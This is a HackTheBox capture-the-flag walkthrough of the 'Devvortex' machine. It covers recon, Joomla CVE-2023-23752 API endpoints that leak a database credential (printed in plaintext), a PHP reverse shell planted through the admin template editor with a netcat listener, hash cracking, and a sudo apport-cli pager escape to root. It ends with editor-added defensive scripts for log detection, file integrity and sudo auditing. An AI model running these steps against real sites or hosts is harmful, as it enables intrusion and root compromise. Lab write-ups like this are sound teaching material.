Devvortex

Devvortex writeup by Thamizhiniyan C S

Overview

Hello everyone. In this writeup we are going to solve Devvortex from HackTheBox.

Link for the machine : https://app.hackthebox.com/machines/Devvortex

Difficulty Level : Easy

Let's Start 🙌

Connect to the HTB server using the OpenVPN configuration file generated by HTB.

[ Click Here to learn more about how to connect to the VPN and access the boxes. ]

After connecting to the VPN service, click on Join Machine to get the machine's IP.

After joining the machine you can see the IP Address of the target machine.


Reconnaissance

Rustscan

rustscan -a <TARGET> -- -T4 -v -A

Nmap Default Scripts

nmap -sC <TARGET>

Results

Port   Service   Service Version
22     SSH       -
80     HTTP      -


Information Gathering - devvortex.htb

From the reconnaissance results, there is a website running on port 80. I visited the website, but it redirects to the domain devvortex.htb, and that domain name does not resolve.

To access the website, we have to map the domain name to the target IP. We can do this by modifying the /etc/hosts file. Append the line mapping the target IP to devvortex.htb (the underlined line in the image below) to the /etc/hosts file. The target IP might differ in your case.

After modifying the /etc/hosts file, refresh the website to see the contents of the website.

Active Infrastructure Enumeration

Headers

curl -I "http://${TARGET}"

Whatweb

whatweb -a 1 http://devvortex.htb

Wafw00f

wafw00f http://devvortex.htb

Active Subdomain Enumeration

Subdomain Fuzzing

ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.devvortex.htb/

VHost Fuzzing

ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://devvortex.htb/ -H 'Host: FUZZ.devvortex.htb' -fs 154

Results

Found no subdomains.

Found a vhost dev.devvortex.htb.

To access the vhost, add the new subdomain to /etc/hosts as before and visit the subdomain in a browser.


Information Gathering - dev.devvortex.htb

After modifying the /etc/hosts file, refresh the website to see the contents of the website.

Active Infrastructure Enumeration

Headers

curl -I "http://dev.devvortex.htb"

Whatweb

whatweb -a 1 http://dev.devvortex.htb

Wafw00f

wafw00f http://dev.devvortex.htb

Results

Nothing interesting found.


Enumerating the Website - dev.devvortex.htb

Robots.txt

robots.txt - Found

From the paths listed in robots.txt, the /administrator path sounds interesting.

So I first visited the /administrator path.

It's a Joomla Administrator Login page.

I first tried some default credentials like admin:admin, but they didn't work.

Droopescan

Next I used the droopescan tool to enumerate the Joomla website.

droopescan scan joomla --url http://dev.devvortex.htb/

From the results of droopescan, I visited http://dev.devvortex.htb/administrator/manifests/files/joomla.xml to check for version information.

joomla.xml was accessible and revealed the Joomla version: 4.2.6.

Next I searched for exploits for the above version and found the following:

CVE-2023-23752

Looking at the exploit, it basically makes requests to the following endpoints, parses the response data and displays it to us:

/api/index.php/v1/users?public=true

/api/index.php/v1/config/application?public=true

So, instead of running the exploit, I directly visited the above endpoints in the browser.

The first endpoint responded with a list of users.

And the second endpoint responded with the configuration of the application, which also contained the password of the user lewis, whom we found in the previous endpoint and who is part of the Super Users group.
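For the defensive side of the same finding, here is an added example (written for this writeup by the editor, not part of the original post or of the exploit) that scans web-server access logs for requests to the two Joomla API endpoints listed above and reports whether the server actually served data to an unauthenticated caller. The log lines are constructed in the combined log format; only the endpoint paths and the public=true parameter come from the writeup.

```python
"""
Detect probes of the Joomla 4 web-services endpoints abused by
CVE-2023-23752 in Apache/nginx "combined" access logs.

Added example by the editor, not part of the original writeup.
The log lines below are constructed.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Endpoints the writeup (and the public exploit) requests.
SENSITIVE_API_PATHS = (
    "/api/index.php/v1/users",
    "/api/index.php/v1/config/application",
)

# Constructed sample log lines: two successful probes from one client,
# one request without public=true that the server rejected, and noise.
SAMPLE_LOG = """\
10.10.14.5 - - [26/Nov/2023:10:01:02 +0000] "GET /administrator/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.5 - - [26/Nov/2023:10:01:09 +0000] "GET /api/index.php/v1/users?public=true HTTP/1.1" 200 843 "-" "Mozilla/5.0"
10.10.14.5 - - [26/Nov/2023:10:01:15 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1322 "-" "Mozilla/5.0"
10.10.14.7 - - [26/Nov/2023:10:02:00 +0000] "GET /api/index.php/v1/config/application HTTP/1.1" 401 120 "-" "curl/8.0"
10.10.14.9 - - [26/Nov/2023:10:03:00 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# client, ident, user, [timestamp], "METHOD target PROTO", status, size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Return the fields we need as a dict, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def scan_log(text):
    """
    Return one dict per request to a sensitive API path.

    'public' is True when the request carried public=true (the parameter
    the exploit relies on); 'leaked' is True when the server answered 200,
    i.e. the endpoint served data without authentication and the site is
    still exposed. Any request to these paths is worth reviewing, so the
    match is on the path alone and the query string only annotates it.
    """
    hits = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        url = urlsplit(entry["target"])
        if url.path not in SENSITIVE_API_PATHS:
            continue
        public = parse_qs(url.query).get("public", [""])[0].lower() == "true"
        hits.append({
            "ip": entry["ip"],
            "path": url.path,
            "status": entry["status"],
            "public": public,
            "leaked": entry["status"] == 200,
        })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        state = "DATA SERVED" if hit["leaked"] else "rejected"
        print(f"{hit['ip']} -> {hit['path']} ({hit['status']}, public={hit['public']}) {state}")
```

A 200 on either path from an unauthenticated client is the signal that the site is unpatched; after patching, the same probes should show up as 401/403 and the "leaked" flag stays False.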


Initial Access

With the credentials lewis:P4ntherg0t1n5r3c0n## found during enumeration, I tried to log in to the Joomla administrator page and was able to log in successfully.

Since we have access to the administrator dashboard, I checked whether it is possible to inject or modify code in the available templates, as mentioned here:

We can see the available templates under the System tab of the dashboard. I decided to try to modify the administrator template.

Next select the following.

In the template customisation page you can see a list of the available files and options to create, edit, save and delete files.

I decided to create a PHP file containing code that connects a reverse shell back to us from the server. First click New File.

There is an option to upload a file; I tried to upload a PHP reverse shell, but it didn't work. So I decided to create a new file and paste the contents of the PHP reverse shell into it. To do so, enter the file name, choose php as the extension and then click Create.

I used the pentest monkey PHP reverse shell:

I copied the contents of the reverse shell and pasted them into the editor. Don't forget to update your tun0 IP address in the reverse shell.

Now click Save & Close and start a netcat listener using the command nc -lvnp 1234.

Now visit the following URL: http://dev.devvortex.htb/administrator/templates/atum/<nameTheFileThatYouCreated>.php and check your listener.

Now we got the reverse shell back.

I first upgraded my shell using the command: python3 -c "import pty;pty.spawn('/bin/bash')".

We can see that we are currently the user www-data.

Now it's time to look for privilege escalation vectors.
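A defender can catch the step above (a new PHP file written into the administrator template directory through the template editor) with a simple baseline-and-diff integrity check. The following is an added example by the editor, not code from the writeup or from Joomla: it hashes a template tree once, stores the baseline, and later reports added, modified and removed files, singling out new or changed server-side executable files. The directory contents are constructed in a temporary directory; on a real install the path would be <joomla_root>/administrator/templates/atum, which is the path the writeup visits.

```python
"""
Baseline-and-diff integrity check for a Joomla template directory.

Added example by the editor, not part of the original writeup or of
Joomla. The template tree is constructed in a temp dir; the real
directory is <joomla_root>/administrator/templates/atum.
"""
import hashlib
import json
import os
import tempfile

# Extensions the web server will execute; a new file with one of these in
# a template directory is the classic footprint of an editor-dropped shell.
EXECUTABLE_EXT = (".php", ".phtml", ".phar")


def hash_tree(root):
    """Map relative path -> sha256 hex digest for every regular file under root."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            h = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            digests[rel] = h.hexdigest()
    return digests


def diff_baseline(baseline, current):
    """
    Compare two hash maps and return added/removed/modified lists plus
    'suspicious': the subset of added or modified files that the server
    would execute. Legitimate edits to assets (JSON, CSS) are still
    reported under 'modified' but not flagged as suspicious.
    """
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    modified = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    suspicious = sorted(p for p in added + modified if p.lower().endswith(EXECUTABLE_EXT))
    return {"added": added, "removed": removed, "modified": modified, "suspicious": suspicious}


def demo():
    """Build a constructed template tree, baseline it, then simulate the editor changes."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "html"))
        stock = {
            "index.php": "<?php // stock template entry point\n",
            "component.php": "<?php // stock\n",
            "html/modules.php": "<?php // stock override\n",
            "joomla.asset.json": "{}\n",
        }
        for rel, content in stock.items():
            with open(os.path.join(root, rel), "w") as fh:
                fh.write(content)

        # Baseline taken at install time; in practice store it outside the web root.
        baseline_json = json.dumps(hash_tree(root), sort_keys=True)

        # Simulate what the writeup does (a new .php file created via the
        # editor) plus an ordinary edit to an asset file.
        with open(os.path.join(root, "rev.php"), "w") as fh:
            fh.write("<?php /* constructed placeholder content, not a shell */ ?>\n")
        with open(os.path.join(root, "joomla.asset.json"), "w") as fh:
            fh.write('{"version": "2"}\n')

        return diff_baseline(json.loads(baseline_json), hash_tree(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run periodically (cron, or a file-integrity tool such as AIDE doing the same job), anything under "suspicious" warrants an immediate look, and a non-empty "added" list inside a stock template directory is rarely legitimate outside a Joomla upgrade.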


Privilege Escalation

Getting The User Flag

First I checked the available users in the target machine.

There is another user named logan, and I checked the /home/logan folder, which has the user flag, but we don't have permission to read it.

Next I looked for some basic privilege escalation vectors but got nothing. Then I remembered the credentials we used to log in to Joomla, which we can try to use to log in to the MySQL database.

mysql -u lewis -p

( -p prompts for the password )

I was able to log in successfully and found a database named joomla.

Next I viewed the available tables using the command: show tables;

The above command responded with a long list of tables, of which the sd4fg_users table caught my attention.

Next I viewed the contents of the sd4fg_users table.

It had two users with their password hashes, which look like a usual Linux user account password hash ( blowfish hash ). Since we know that there is another user on the machine named logan, I tried to crack logan's password hash using john.

It cracked, and I used the password to log in as logan to the target machine via SSH.

I was able to log in successfully and also got the user flag.

Getting The Root Flag

Next, I again started looking for privilege escalation vectors. I started with the sudo -l command and got the following output.

The user logan can only run /usr/bin/apport-cli with root privileges. apport-cli is basically a tool that generates crash reports. Next I checked the version of apport-cli.

I searched about the above version of apport-cli and found the following commit:

which is a PoC for using this tool to escalate our privileges.

I tried it, but I wasn't able to find a crash file in the /var/crash location. Then I searched Google for how to create the crash file and got the following crash file content from

I manually created a crash file in /var/crash with a .crash extension and the above content, and the exploit worked just fine as described in the PoC.

To get a root shell, enter the following command in the pager view: !/bin/bash

We successfully got a shell with root privileges.

Successfully got the root flag.
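The root cause here is a sudo rule that lets an unprivileged user run, as root, a program which opens an interactive pager. The added example below (written by the editor, not part of the writeup) audits `sudo -l` output for that pattern: it parses each rule, flags commands whose program is known to open a pager or editor, and skips rules that carry sudo's NOEXEC tag, which stops the program from executing a child such as the pager at all. The sample output is constructed to match what the writeup describes (logan may run /usr/bin/apport-cli as root) with a few extra rules for contrast; the set of pager-spawning programs is the editor's assumption, based on each program's documented behaviour, and the apport-cli entry reflects the pager view this writeup uses.

```python
"""
Audit `sudo -l` output for rules that give a user a program which opens an
interactive pager or editor as root.

Added example by the editor, not part of the original writeup. The sample
output is constructed; PAGER_SPAWNERS is an assumption based on each
program's documented behaviour.
"""
import re

# Programs that open a pager/editor when run. apport-cli pages crash reports
# through a pager; the others are pagers or editors themselves.
PAGER_SPAWNERS = {"apport-cli", "less", "more", "man", "vi", "vim", "nano"}

# Constructed `sudo -l` output. The first rule mirrors the writeup; the rest
# show a NOPASSWD pager, a NOEXEC-protected pager and a harmless command.
SAMPLE_SUDO_L = """\
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli
    (ALL) NOPASSWD: /usr/bin/less /var/log/syslog
    (ALL) NOEXEC: /usr/bin/man
    (root) /usr/bin/systemctl restart apache2
"""

# "(runas) TAG: TAG: command args" as printed by sudo -l
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$"
)


def parse_rules(text):
    """Return a list of (runas, tags, command) for each rule line in `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        rules.append((m.group("runas").strip(), tags, m.group("cmd").strip()))
    return rules


def audit(text):
    """
    Return a finding for each rule whose program is in PAGER_SPAWNERS and
    which is not protected by NOEXEC. NOEXEC makes sudo block execve() from
    the program, so the pager (and anything started from it) cannot run;
    the viewing feature breaks, but so does the escape.
    """
    findings = []
    for runas, tags, cmd in parse_rules(text):
        prog = cmd.split()[0].rsplit("/", 1)[-1]
        if prog not in PAGER_SPAWNERS or "NOEXEC" in tags:
            continue
        findings.append({
            "command": cmd,
            "runas": runas,
            "nopasswd": "NOPASSWD" in tags,
            "reason": (
                f"{prog} opens an interactive pager/editor as the run-as user; "
                "remove the rule, add the NOEXEC tag, or make sure the pager runs "
                "in secure mode (less honours LESSSECURE=1, which disables shell escapes)"
            ),
        })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SUDO_L):
        pw = "NOPASSWD" if f["nopasswd"] else "password required"
        print(f"[!] ({f['runas']}) {f['command']} [{pw}]\n    {f['reason']}")
```

On a real host, pipe the live output in with something like `sudo -l | python3 audit_sudo.py` (the script name is the editor's choice) after replacing SAMPLE_SUDO_L with stdin; keeping the package updated is the primary fix for apport itself, and the audit is there to catch the rule that made the pager matter in the first place.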

Thank You……
